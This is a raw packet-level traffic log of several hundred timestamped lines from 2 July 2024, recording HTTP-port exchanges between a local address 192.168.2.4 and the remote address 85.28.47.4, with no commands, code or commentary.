                                            Jul 2, 2024 08:26:30.066154003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.066154003 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.066169024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.066180944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.066191912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.066194057 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.066227913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.144670963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.144701958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.144715071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.144726992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.144740105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.144752979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.144769907 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.144823074 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.144889116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.144927025 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.144957066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.144969940 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.144989967 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145003080 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145097971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145109892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145122051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145129919 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145143986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145158052 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145277977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145297050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145309925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145313025 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145322084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145324945 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145334005 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145343065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145344973 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145359039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145382881 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145549059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145560980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145575047 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145581007 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145596027 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145596981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145606995 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145610094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145622969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145626068 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145639896 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145653963 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145836115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145870924 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145935059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145956039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145967007 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.145968914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145981073 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145992041 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.145993948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146003008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146015882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146020889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146028042 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146042109 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146045923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146064043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146084070 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146369934 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146383047 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146394968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146404982 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146420002 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146631956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146644115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146655083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146665096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146665096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146677017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146687031 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146689892 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146702051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146713018 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146714926 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146724939 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146728039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146735907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146748066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146749020 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146759987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146771908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146771908 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146785021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.146800995 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.146826982 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.151987076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152033091 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152050018 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152061939 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152086020 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152102947 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152184963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152198076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152209997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152220964 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152221918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152240992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152277946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152440071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152452946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152465105 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152477026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152477980 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152503014 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152513027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152524948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152524948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152539968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152545929 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152559996 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152571917 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152776003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152787924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152798891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152806997 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152818918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152822971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152833939 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152836084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152848959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152853012 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152863979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152867079 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152875900 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152888060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152889967 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152899981 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152899981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.152920961 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.152944088 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153330088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153342009 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153353930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153366089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153377056 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153384924 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153388977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153400898 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153402090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153414011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153431892 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153445959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153780937 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153800011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153814077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153815985 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153825045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153826952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153839111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153840065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153850079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153852940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153862953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153868914 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153873920 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153881073 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153884888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153896093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153899908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153908968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153912067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153923035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153924942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153935909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.153935909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153949022 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.153968096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.154544115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154556036 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154567003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154577971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154587984 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154597044 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.154599905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154612064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154613018 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.154623985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154628992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.154635906 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154643059 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.154647112 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154658079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154669046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.154669046 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154681921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154691935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154694080 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.154704094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154710054 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.154720068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154725075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.154731989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154742956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.154746056 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.154768944 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.154788971 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.155328989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.155342102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.155353069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.155365944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.155374050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.155376911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.155407906 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.234301090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.234323025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.234338045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.234359980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.234371901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.234384060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.234395981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.234409094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.234417915 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.234460115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.235990047 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236001015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236006975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236011982 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236016989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236022949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236032963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236038923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236049891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236061096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236072063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236088037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236100912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236104012 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.236113071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236123085 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236135006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236136913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.236146927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236159086 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236162901 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.236171961 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236182928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.236186028 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236196995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236207962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236219883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236222982 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.236231089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236243010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236251116 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.236254930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236267090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236270905 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.236279011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236289978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.236290932 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.236310005 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.236331940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.279979944 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.284811020 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461354971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461375952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461388111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461394072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461405039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461416006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461426973 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461438894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461450100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461461067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461472034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461478949 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461482048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461493015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461504936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461515903 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461527109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461530924 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461539030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461548090 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461549997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461560965 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461566925 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461572886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461580038 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461585045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461595058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461602926 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461607933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461617947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461627960 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461632967 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461639881 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461643934 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461651087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461663008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461663961 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461673975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461682081 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461683989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461694956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461704016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461707115 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461716890 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461718082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461730003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461740971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461740971 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461751938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461764097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461770058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461777925 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461781025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461791992 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461795092 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461802959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461811066 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461813927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461824894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461824894 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461837053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461847067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461853027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461858034 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461863995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461874008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461880922 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461885929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461894035 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461895943 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461906910 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461910009 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461919069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461922884 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461930037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461939096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461941004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461951971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461962938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461965084 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461973906 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461982965 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:30.461985111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461996078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:30.461999893 CEST6388080192.168.2.485.28.47.4
